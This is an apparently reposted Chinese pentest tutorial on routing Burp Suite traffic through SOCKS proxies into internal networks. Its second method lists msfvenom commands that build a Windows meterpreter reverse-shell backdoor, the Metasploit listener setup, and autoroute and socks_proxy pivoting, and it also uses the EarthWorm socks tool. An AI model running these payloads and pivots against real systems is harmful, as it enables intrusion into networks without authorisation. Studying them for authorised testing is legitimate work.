01.burp代理設置


 

場景1:

 

  通過VPN代理進入內網測試web時需要掛burp抓包改包,掛vpn直接訪問的話、burp可以截到包但是無法正常訪問到,這個時候我們可以配置上游代理進行抓包。

 

解決辦法

 

設置方式1:

通過burp走上游代理burp->本地8080->本地系統代理->目標地址

配置burp

1.攔截包處和以前一樣,在用戶配置User Option處配置websocket,配置一個本地的socks代理

 

 2.本地開一個socks代理,目的讓瀏覽器的流量先走到本地的全局代理—》通過本地的全局代理通過vpn走到目標地址。

下載ew

https://github.com/idlefire/ew

ew.exe -s ssocksd -l 8888

 

 3.配置全局代理

使用socks代理工具開一個全局代理,再抓包就ok了。

 

設置方式2:

  在實際環境中,使用msf設置代理跨網段訪問時,用的是socks4a模塊現在的最新版本的msf這個工具已經把socks4a模塊集合到socks模塊里面。

  代理的通信經過流程

  本地

  

127.0.0.1:8080 ->localhost:25378->192.168.0.190:1080->10.10.10.130:80

  首先生成后門

msfvenom-p windows/meterpreter/reverse_tcp lhost=192.168.0.190  lport=4455 -fexe >r.exe

  設置msf監聽模塊

msfconsole
use exploit/multi/handler 
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.0.190
set lport 4455
exploit

  設置web服務器

sudo python -m SimpleHTTPServer 80

  設置路由

run autoroute -s 10.10.10.0/24

  使用socks_proxy模塊

backgroupd
useauxiliary/server/socks_proxy
setversion 4a
run

 

 

 

 

使用SocksCap64設置代理隧道

192.168.0.190 1080

 

 

將火狐瀏覽器 代理到隧道中打開瀏覽目標網站

啟動本地系統代理25378

 

設置頂級代理訪問內網

 

 

 

 抓包測試

 

 

場景2

  burpsuite對內網的web系統進行漏洞掃描,或者進行測試,需要設置代理進行訪問內網。

 

burpsuite設置socks5代理訪問內網

 

使用ew開啟socks5代理

ew_for_Win.exe-s ssocksd -l 1080

 

訪問內網10段的80端口

 

 

 

 

 

 

 

 

 

 


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM